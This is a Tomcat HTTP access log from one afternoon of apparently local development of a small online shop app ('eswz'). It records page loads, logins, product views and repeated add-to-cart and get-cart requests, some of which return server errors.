0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:27 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 96
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/index HTTP/1.1" 200 17170 http-bio-8080-exec-4 839
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/css/1.css HTTP/1.1" 304 - http-bio-8080-exec-5 15
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/img/lunbo4.jpg HTTP/1.1" 304 - http-bio-8080-exec-1 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/img/tu.jpg HTTP/1.1" 304 - http-bio-8080-exec-8 7
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/img/lunbo2.jpg HTTP/1.1" 304 - http-bio-8080-exec-9 7
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/img/lunbo1.jpg HTTP/1.1" 304 - http-bio-8080-exec-7 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/img/lunbo3.jpg HTTP/1.1" 304 - http-bio-8080-exec-6 20
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/img/lunbo5.jpg HTTP/1.1" 304 - http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/img/lunbo6.jpg HTTP/1.1" 304 - http-bio-8080-exec-9 4
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/img/lunbo7.jpg HTTP/1.1" 304 - http-bio-8080-exec-1 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/img/2.jpg HTTP/1.1" 304 - http-bio-8080-exec-10 6
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/img/9.jpg HTTP/1.1" 304 - http-bio-8080-exec-5 4
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/img/4.jpg HTTP/1.1" 304 - http-bio-8080-exec-10 4
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/img/7.jpg HTTP/1.1" 304 - http-bio-8080-exec-9 6
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/img/3.jpg HTTP/1.1" 304 - http-bio-8080-exec-5 6
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/img/6.jpg HTTP/1.1" 304 - http-bio-8080-exec-7 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:28 +0800] "GET /eswz/img/8.jpg HTTP/1.1" 304 - http-bio-8080-exec-3 6
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:29 +0800] "GET /eswz/img/1.jpg HTTP/1.1" 304 - http-bio-8080-exec-3 4
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:29 +0800] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:34 +0800] "GET /eswz/insertCart HTTP/1.1" 500 4075 http-bio-8080-exec-1 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:40 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-7 7
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:46 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 14
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:47 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-7 31
0:0:0:0:0:0:0:1 - - [19/Nov/2022:14:59:49 +0800] "GET /eswz/insertCart HTTP/1.1" 500 13792 http-bio-8080-exec-7 61
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:02:10 +0800] "GET /eswz/insertCart HTTP/1.1" 500 13792 http-bio-8080-exec-6 21
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:10:37 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:10:37 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 54
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:10:38 +0800] "GET /eswz/index HTTP/1.1" 200 17170 http-bio-8080-exec-4 491
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:10:45 +0800] "GET /eswz/insertCart HTTP/1.1" 500 4075 http-bio-8080-exec-5 13
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:10:50 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-2 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:10:54 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:10:55 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-8 29
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:10:59 +0800] "GET /eswz/insertCart HTTP/1.1" 200 61 http-bio-8080-exec-9 21
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:11:01 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-10 26
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:12:52 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:12:52 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 55
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:12:53 +0800] "GET /eswz/index HTTP/1.1" 200 17170 http-bio-8080-exec-4 712
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:12:54 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:13:01 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:13:02 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-7 35
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:13:04 +0800] "GET /eswz/insertCart HTTP/1.1" 500 4075 http-bio-8080-exec-8 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:15 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:15 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 56
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:16 +0800] "GET /eswz/index HTTP/1.1" 200 17170 http-bio-8080-exec-4 741
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:19 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:24 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:25 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-7 31
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:27 +0800] "GET /eswz/detailGoods?goodsid=2 HTTP/1.1" 200 5412 http-bio-8080-exec-8 20
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:27 +0800] "GET /eswz/index.css HTTP/1.1" 200 17696 http-bio-8080-exec-9 24
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:32 +0800] "GET /eswz/insertCart HTTP/1.1" 200 61 http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:33 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-10 25
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:37 +0800] "GET /eswz/detailGoods?goodsid=4 HTTP/1.1" 200 5190 http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:37 +0800] "GET /eswz/index.css HTTP/1.1" 200 17696 http-bio-8080-exec-10 20
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:40 +0800] "GET /eswz/insertCart HTTP/1.1" 200 61 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:41 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:44 +0800] "GET /eswz/insertCart HTTP/1.1" 200 61 http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:18:45 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-10 20
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:00 +0800] "GET /eswz/insertCart HTTP/1.1" 200 61 http-bio-8080-exec-10 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:01 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-10 20
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:03 +0800] "GET /eswz/insertCart HTTP/1.1" 200 61 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:05 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-10 20
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:13 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:14 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:15 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-10 20
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:15 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:15 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-10 16
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:21 +0800] "GET /eswz/loginout HTTP/1.1" 200 2635 http-bio-8080-exec-10 3
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:24 +0800] "GET /eswz/index HTTP/1.1" 200 17170 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:28 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-10 5
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:46 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:46 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 32
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:47 +0800] "GET /eswz/index HTTP/1.1" 200 17170 http-bio-8080-exec-4 436
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:47 +0800] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-5 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:49 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-6 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:54 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 13
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:55 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-8 38
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:19:57 +0800] "GET /eswz/insertCart HTTP/1.1" 500 4075 http-bio-8080-exec-9 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:20:03 +0800] "GET /eswz/detailGoods?goodsid=2 HTTP/1.1" 200 5412 http-bio-8080-exec-2 18
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:20:03 +0800] "GET /eswz/index.css HTTP/1.1" 200 17696 http-bio-8080-exec-2 26
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:20:06 +0800] "GET /eswz/insertCart HTTP/1.1" 200 61 http-bio-8080-exec-2 19
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:20:08 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-2 23
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:21:27 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:21:28 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 50
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:21:28 +0800] "GET /eswz/index HTTP/1.1" 200 17170 http-bio-8080-exec-4 650
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:21:30 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:21:35 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:21:36 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-7 35
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:21:38 +0800] "GET /eswz/insertCart HTTP/1.1" 500 4075 http-bio-8080-exec-8 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:25:32 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:25:32 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 39
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:25:33 +0800] "GET /eswz/index HTTP/1.1" 500 4094 http-bio-8080-exec-4 661
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:26:46 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:26:46 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 45
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:26:47 +0800] "GET /eswz/index HTTP/1.1" 200 17170 http-bio-8080-exec-4 725
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:26:49 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 8
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:26:53 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 13
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:26:54 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-7 36
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:26:57 +0800] "GET /eswz/insertCart HTTP/1.1" 500 4075 http-bio-8080-exec-8 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:26:59 +0800] "GET /eswz/detailGoods?goodsid=2 HTTP/1.1" 200 5412 http-bio-8080-exec-2 22
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:26:59 +0800] "GET /eswz/index.css HTTP/1.1" 200 17696 http-bio-8080-exec-10 30
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:27:02 +0800] "GET /eswz/insertCart HTTP/1.1" 200 61 http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:27:03 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-10 23
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:27:05 +0800] "GET /eswz/detailGoods?goodsid=2 HTTP/1.1" 200 5412 http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:27:05 +0800] "GET /eswz/index.css HTTP/1.1" 200 17696 http-bio-8080-exec-10 20
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:27:13 +0800] "GET /eswz/detailGoods?goodsid=2 HTTP/1.1" 200 5412 http-bio-8080-exec-10 14
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:27:13 +0800] "GET /eswz/index.css HTTP/1.1" 200 17696 http-bio-8080-exec-10 25
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:27:21 +0800] "GET /eswz/insertCart HTTP/1.1" 200 61 http-bio-8080-exec-10 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:27:22 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-10 21
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:28:44 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:28:44 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 38
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:28:45 +0800] "GET /eswz/index HTTP/1.1" 200 7682 http-bio-8080-exec-4 656
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:36:22 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:36:22 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 47
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:36:23 +0800] "GET /eswz/index HTTP/1.1" 200 17170 http-bio-8080-exec-4 1197
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:36:27 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:36:32 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:36:34 +0800] "GET /eswz/index HTTP/1.1" 200 17696 http-bio-8080-exec-7 31
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:36:36 +0800] "GET /eswz/insertCart HTTP/1.1" 500 4307 http-bio-8080-exec-8 16
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:40:12 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:40:12 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 37
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:40:13 +0800] "GET /eswz/index HTTP/1.1" 200 16251 http-bio-8080-exec-4 1303
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:40:18 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:40:23 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:40:24 +0800] "GET /eswz/index HTTP/1.1" 200 16784 http-bio-8080-exec-7 30
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:40:27 +0800] "GET /eswz/detailGoods?goodsid=2 HTTP/1.1" 200 5261 http-bio-8080-exec-8 106
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:40:27 +0800] "GET /eswz/index.css HTTP/1.1" 200 16784 http-bio-8080-exec-9 34
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:40:28 +0800] "GET /eswz/insertCart HTTP/1.1" 200 61 http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:40:29 +0800] "GET /eswz/index HTTP/1.1" 200 16784 http-bio-8080-exec-10 24
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:40:32 +0800] "GET /eswz/detailGoods?goodsid=9 HTTP/1.1" 200 5278 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:40:32 +0800] "GET /eswz/index.css HTTP/1.1" 200 16784 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:40:37 +0800] "GET /eswz/insertCart HTTP/1.1" 200 61 http-bio-8080-exec-10 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:40:39 +0800] "GET /eswz/index HTTP/1.1" 200 16784 http-bio-8080-exec-10 27
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:49:19 +0800] "GET /eswz/index HTTP/1.1" 200 16784 http-bio-8080-exec-8 31
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:49:19 +0800] "GET /eswz/index?classification.classificationid=1 HTTP/1.1" 200 7847 http-bio-8080-exec-8 21
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:49:21 +0800] "GET /eswz/index?classification.classificationid=2 HTTP/1.1" 200 14459 http-bio-8080-exec-8 21
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:49:21 +0800] "GET /eswz/img/5.jpg HTTP/1.1" 304 - http-bio-8080-exec-8 6
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:49:23 +0800] "GET /eswz/index?classification.classificationid=3 HTTP/1.1" 200 10861 http-bio-8080-exec-8 18
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:49:25 +0800] "GET /eswz/index HTTP/1.1" 200 16784 http-bio-8080-exec-8 19
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:49:34 +0800] "GET /eswz/loginout HTTP/1.1" 200 2635 http-bio-8080-exec-8 4
0:0:0:0:0:0:0:1 - - [19/Nov/2022:15:49:35 +0800] "GET /eswz/index HTTP/1.1" 200 16251 http-bio-8080-exec-8 19
87.236.176.145 - - [19/Nov/2022:15:53:50 +0800] "GET / HTTP/1.1" 404 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:27:22 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:27:23 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 37
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:27:24 +0800] "GET /eswz/index HTTP/1.1" 200 16252 http-bio-8080-exec-4 1308
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:27:27 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:27:34 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 14
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:27:35 +0800] "GET /eswz/index HTTP/1.1" 200 16785 http-bio-8080-exec-7 30
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:27:40 +0800] "GET /eswz/detailGoods?goodsid=2 HTTP/1.1" 200 5261 http-bio-8080-exec-8 19
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:27:40 +0800] "GET /eswz/index.css HTTP/1.1" 200 16785 http-bio-8080-exec-9 26
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:27:41 +0800] "GET /eswz/insertCart HTTP/1.1" 500 11953 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:27:53 +0800] "GET /eswz/getCart HTTP/1.1" 500 14057 http-bio-8080-exec-2 39
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:35:05 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:35:05 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 43
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:35:07 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 1962
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:35:09 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:35:15 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:35:16 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 26
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:35:17 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 14057 http-bio-8080-exec-8 57
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:38:33 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:38:33 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 43
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:38:33 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 471
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:38:40 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:38:45 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 13
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:38:47 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 32
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:38:52 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 14067 http-bio-8080-exec-8 48
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:41:40 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:41:40 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 43
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:41:40 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 519
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:41:43 +0800] "GET /eswz/getCart?userid= HTTP/1.1" 400 968 http-bio-8080-exec-5 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:41:54 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-2 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:41:58 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 13
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:41:59 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-8 31
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:42:01 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 14116 http-bio-8080-exec-9 42
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:43:50 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:43:50 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 36
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:43:50 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 459
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:43:52 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:43:58 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:43:59 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 29
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:44:00 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 404 1021 http-bio-8080-exec-8 13
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:44:44 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:44:44 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 50
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:44:45 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 568
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:44:46 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 8
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:44:51 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:44:52 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 29
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:44:54 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 3901 http-bio-8080-exec-8 732
